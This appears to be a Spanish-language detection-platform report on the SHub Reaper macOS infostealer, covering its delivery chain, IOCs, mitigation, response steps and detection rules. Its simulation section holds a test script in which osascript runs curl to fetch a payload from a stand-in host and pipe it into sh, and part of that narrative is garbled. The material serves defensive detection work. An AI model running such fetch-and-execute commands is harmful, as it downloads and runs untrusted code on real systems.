SHub Reaper | El ladrón de macOS suplanta a Apple, Google y Microsoft en una sola cadena de ataque
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe analiza una nueva variante de infostealer para macOS llamada SHub Reaper, que utiliza instaladores falsos de WeChat y Miro para entregar una carga útil maliciosa de AppleScript a través de un dominio con tema de Microsoft con errores tipográficos. Una vez lanzada en el Editor de Scripts, la carga útil recopila datos del navegador, archivos de billeteras de criptomonedas e información del llavero, luego exfiltra el contenido robado como archivos ZIP fragmentados. El malware también altera los archivos de la billetera y establece persistencia a través de un LaunchAgent disfrazado como una actualización de software de Google. La detección recomendada se centra en la ejecución de AppleScript, la creación sospechosa de LaunchAgent y el tráfico saliente a la infraestructura conocida de comando y control.
Investigación
SentinelOne rastreó toda la cadena de entrega en múltiples etapas, incluida la explotación del esquema applescript:// , la generación dinámica de la carga útil de AppleScript y un módulo de captura de archivos que refleja el comportamiento de robo de documentos visto en AMOS. Los investigadores capturaron tráfico de red al dominio de comando y control hebsbsbzjsjshduxbs.xyz y a puntos finales relacionados, junto con la creación de archivos temporales en /tmp y un LaunchAgent colocado en el directorio de la Biblioteca del usuario. La investigación también descubrió funcionalidad de bot de Telegram codificada específicamente para telemetría de operadores.
Mitigación
Los defensores deben bloquear el acceso a los dominios con errores tipográficos mlcrosoft.co.com, qq-0732gwh22.com, y mlroweb.com, y monitorear los LaunchAgents creados bajo rutas que imitan los componentes de actualización de Google. Debe usarse una lista blanca de aplicaciones para restringir la ejecución de AppleScript desde fuentes no confiables y se debe hacer cumplir la verificación estricta de firmas de código. Las detecciones de red también deben alertar sobre la comunicación con el dominio de comando y control identificado y sus rutas de API conocidas.
Respuesta
Si se detecta actividad de SHub Reaper, aísle inmediatamente el punto final afectado, termine cualquier proceso sospechoso de AppleScript o LaunchAgent y elimine los archivos maliciosos de /tmp y la Biblioteca del usuario. Los investigadores deben realizar entonces una recopilación forense completa de las tiendas de datos del navegador, directorios de billeteras y repositorios de credenciales, seguidos por restablecimientos de credenciales donde se sospeche de compromiso. La infraestructura de comando y control identificada debe ser bloqueada, y el equipo de respuesta a incidentes debe comenzar una búsqueda de amenazas más amplia en todo el entorno.
Flujo de Ataque
Detecciones
Posible intento de comunicación de búsqueda de dominio IP (vía dns)
Ver
Firma forzada de código de paquete de aplicación modificado (vía línea de comando)
Ver
Utilidad de archivo de MacOS apuntando a directorio sospechoso (vía línea de comando)
Ver
Intento de ejecución sospechosa de Curl [MacOS] (vía línea de comando)
Ver
Archivo fue creado en la carpeta temporal de MacOS (vía evento de archivo)
Ver
Posible manipulación de cadenas codificadas en Base64 (vía línea de comando)
Ver
IOCs (HashSha256) para detectar: SHub Reaper | macOS Stealer suplanta a Apple, Google y Microsoft en una sola cadena de ataque
Ver
IOCs (HashMd5) para detectar: SHub Reaper | macOS Stealer suplanta a Apple, Google y Microsoft en una sola cadena de ataque
Ver
Detección de la Cadena de Infección de SHub Reaper usando Dominios con Errores Tipográficos y C2 [Servidor Web]
Ver
Detectar ejecución de malware SHub Reaper a través de AppleScript y Curl [Creación de Proceso en Linux]
Ver
Ejecución de Simulación
Prerrequisito: El Control Previo de Telemetría y Línea Base debe haber pasado.
Motivo: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y tener como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.
-
Narrativa y Comandos del Ataque:
El atacante elabora una línea única que aprovechaosascriptpara ejecutar un comando de shell. Dentro del AppleScript,do shell scriptejecutacurlpara descargar un script de shell remoto (payload.sh) y lo redirige directamente ashpara su ejecución. Debido a que toda la cadena está incrustada en una sola invocación de AppleScript, macOS registra un solo eventoprocess_creationcuya línea de comandos contiene ambos, cumpliendo con la regla de detección.osascriptandcurl, satisfying the detection rule. -
Script de Prueba de Regresión:
#!/bin/bash # # Simular ejecución de SHub Reaper en macOS # Genera un solo evento de process_creation que contiene tanto 'osascript' como 'curl' # MALICIOUS_URL="https://malicious.example.com/payload.sh" # Una línea: osascript ejecuta un comando de shell que descarga el payload y lo ejecuta osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Comandos de Limpieza:
#!/bin/bash # # Limpiar cualquier artefacto creado por la simulación. # El payload se ejecuta en memoria y no escribe archivos, pero aseguramos que no haya procesos residuales. # # Elimina cualquier proceso 'sh' iniciado por la prueba (utilizar con precaución en sistemas de producción) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"